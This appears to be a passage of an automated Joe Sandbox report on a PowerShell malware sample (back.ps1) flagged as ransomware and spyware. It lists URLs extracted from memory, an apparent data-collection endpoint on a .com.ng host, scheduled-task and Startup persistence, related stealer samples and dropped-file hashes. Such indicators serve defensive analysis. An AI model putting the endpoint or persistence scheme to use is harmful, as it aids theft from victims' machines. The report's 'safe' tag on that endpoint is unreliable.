                                                                                                    https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gzzed.exe, 0000000C.00000003.3082680164.00000132F895D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3089378618.00000132F886F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084201791.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082680164.00000132F8910000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082961123.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulezed.exe, 0000000C.00000002.4734251410.00000132F80E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cacheszed.exe, 0000000C.00000002.4734251410.00000132F80E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.ietf.org/rfc/rfc3447.txtzed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-thezed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F8A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syzed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.python.org/psf/license/zed.exe, 0000000C.00000002.4755379300.00007FFD8B568000.00000008.00000001.01000000.0000000A.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tango.freedesktop.org/Tango_Desktop_Projectzed.exe, 00000007.00000003.3198438648.0000019AE1690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://docs.python.org/3/library/multiprocessing.htmlzed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8483000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/pypa/setuptools/issues/417#issuecomment-392298401zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://crl.securetrust.com/STCA.crlzed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://wwwsearch.sf.net/):zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.accv.es/legislacion_c.htmzed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://tools.ietf.org/html/rfc6125#section-6.4.3zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.zlib.net/Dzed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4761922586.00007FFDA3348000.00000008.00000001.01000000.00000020.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://cffi.readthedocs.io/en/latest/using.html#callbackszed.exe, 0000000C.00000002.4762266975.00007FFDA34EC000.00000002.00000001.01000000.0000001C.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crl.xrampsecurity.com/XGCA.crl0zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://bugs.python.org/issue44497.zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.cert.fnmt.es/dpcs/zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://setuptools.pypa.io/en/latest/pkg_resources.htmlzed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080331199.00000132F839E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://google.com/mailzed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://linuxreviews.org/HOWTO_change_the_mouse_speed_zed.exe, 0000000C.00000002.4743750597.00000132F9AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://.VisualCpowershell.exe, 00000000.00000002.4871936149.000001EE2F106000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://packaging.python.org/specifications/entry-points/zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/jaraco/jaraco.functools/issues/5zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.accv.es00zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.python.org/psf/license/)zed.exe, 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyzed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000pzed.exe, 0000000C.00000002.4745134537.00000132F9FD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.rfc-editor.org/info/rfc7253zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://github.com/pyca/cryptography/issueszed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdfzed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://tools.ietf.org/html/rfc8017#page-67zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://foss.heptapod.net/pypy/pypy/-/issues/3539zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://google.com/zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://mahler:8092/site-updates.pyzed.exe, 0000000C.00000003.3084201791.00000132F88FC000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F88DD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084052929.00000132F895F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3085033089.00000132F8907000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://creativecommons.org/licenses/by-sa/3.0/)zed.exe, 00000007.00000003.3198438648.0000019AE1690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://crl.securetrust.com/SGCA.crlzed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://www.microsoft.coKpowershell.exe, 00000000.00000002.4876531934.000001EE2F4F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://.../back.jpegzed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://tools.ietf.org/html/rfc7231#section-4.3.6)zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://tools.ietf.org/html/rfc5869zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            142.132.252.48
                                                                                                                                                                                            usjjsjsj.com.ngCanada
                                                                                                                                                                                            22686UNIVERSITYOFWINNIPEG-ASNCAfalse
                                                                                                                                                                                            104.26.13.205
                                                                                                                                                                                            api.ipify.orgUnited States
                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                            Analysis ID:1566089
                                                                                                                                                                                            Start date and time:2024-12-01 10:36:12 +01:00
                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 15m 17s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:full
                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                            Number of analysed new started processes analysed:36
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Sample name:back.ps1
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal100.rans.spyw.evad.winPS1@36/2334@2/2
                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                            • Successful, ratio: 22.2%
                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                            • Found application associated with file extension: .ps1
                                                                                                                                                                                            • Override analysis time to 240s for powershell
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, VSSVC.exe, svchost.exe
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                            • Execution Graph export aborted for target ChromeComboPack.exe, PID 6860 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 2064 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 3136 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 4132 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7120 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target zed.exe, PID 3196 because there are no executed function
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                            04:37:23API Interceptor90x Sleep call for process: powershell.exe modified
                                                                                                                                                                                            10:38:30Task SchedulerRun new task: RunzedEvery2Minutes path: C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                            10:38:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunTaskboyOnStartup.lnk
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            142.132.252.48ChromeComboPack.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                              og.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                bold.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  ad.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • api.ipify.org/
                                                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • api.ipify.org/
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                    • api.ipify.org/
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                    • api.ipify.org/
                                                                                                                                                                                                    file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                    • api.ipify.org/
                                                                                                                                                                                                    Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                                                                                                                                    • api.ipify.org/
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                    • api.ipify.org/
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                    • api.ipify.org/
                                                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • api.ipify.org/
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                    • api.ipify.org/
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    usjjsjsj.com.ngChromeComboPack.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    og.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    bold.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    ad.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    api.ipify.orgzed.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 172.67.74.152
                                                                                                                                                                                                    kyjjrfgjjsedf.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                    kohjaekdfth.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                    kthkksefd.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                    jhnykawfkth.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                    • 104.26.12.205
                                                                                                                                                                                                    siveria.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                    weWHT1b7JO.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                    Employee_Secure_Doc.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 172.67.74.152
                                                                                                                                                                                                    unique.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                    • 172.67.74.152
                                                                                                                                                                                                    siveria.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                    • 104.26.12.205
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    CLOUDFLARENETUSzed.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 172.67.74.152
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 104.21.16.9
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 172.67.178.189
                                                                                                                                                                                                    sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                    • 104.28.75.41
                                                                                                                                                                                                    gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                    • 104.16.184.241
                                                                                                                                                                                                    tnsoldfik82.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                    • 172.65.251.78
                                                                                                                                                                                                    tnksadfj28.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                    • 172.65.251.78
                                                                                                                                                                                                    Hnsajdkfjd28.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                    • 172.65.251.78
                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                    • 104.21.16.9
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 104.21.16.9
                                                                                                                                                                                                    UNIVERSITYOFWINNIPEG-ASNCAChromeComboPack.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    og.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    bold.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    ad.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.155.193
                                                                                                                                                                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                    • 142.132.46.211
                                                                                                                                                                                                    http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.201.10
                                                                                                                                                                                                    la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.18.86
                                                                                                                                                                                                    http://puzzlewood.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.138.215
                                                                                                                                                                                                    https://thiiirrrrddddddd-30x.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                    • 142.132.152.50
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eog.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    bold.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    ad.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    invoice-6483728493.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    tnsoldfik82.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    tnksadfj28.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    Hnsajdkfjd28.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                    • 142.132.252.48
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_ARC4.pydzed.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousPython Stealer, Amadey, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, CryptbotBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                Payload.exeGet hashmaliciousPython Stealer, BLX Stealer, XLABB GrabberBrowse
                                                                                                                                                                                                                  Payload.exeGet hashmaliciousPython Stealer, BLX Stealer, XLABB GrabberBrowse
                                                                                                                                                                                                                    Creal.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                                                      #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_Salsa20.pydzed.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousPython Stealer, Amadey, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                                                                                                                            file.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                              file.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, CryptbotBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        Payload.exeGet hashmaliciousPython Stealer, BLX Stealer, XLABB GrabberBrowse
                                                                                                                                                                                                                                          Payload.exeGet hashmaliciousPython Stealer, BLX Stealer, XLABB GrabberBrowse
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):47721
                                                                                                                                                                                                                                            Entropy (8bit):5.074822205763267
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:aUWIbV3IpNBQkj2Uh4iUxTaVLfrRJv5FPvlOZhsHvhbardFxJz7OdBYNmzqtAHkU:aU1bV3CNBQkj2Uh4iUxTaVLflJnPvlOA
                                                                                                                                                                                                                                            MD5:1B20CD704D6A154973E28C70CBCA473E
                                                                                                                                                                                                                                            SHA1:99863A35D0E04E4B5E608ADFB8F4CCEF75D87E51
                                                                                                                                                                                                                                            SHA-256:222D8E4703CDD8D1173A38BBF48D1B04BBED749E0B4FEF49C22D20F2E570057F
                                                                                                                                                                                                                                            SHA-512:7DB84F48F9143D1F28CB7FD2B368D70F4F89DF17B13EEF40772FBEA0DCCDD8378B66E056F45286645AAC4C4728742C06D17AB2ACF31A29A357CEEEADDA4D4E92
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:PSMODULECACHE.I....zcL.z..?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):2.0
                                                                                                                                                                                                                                            Encrypted:false
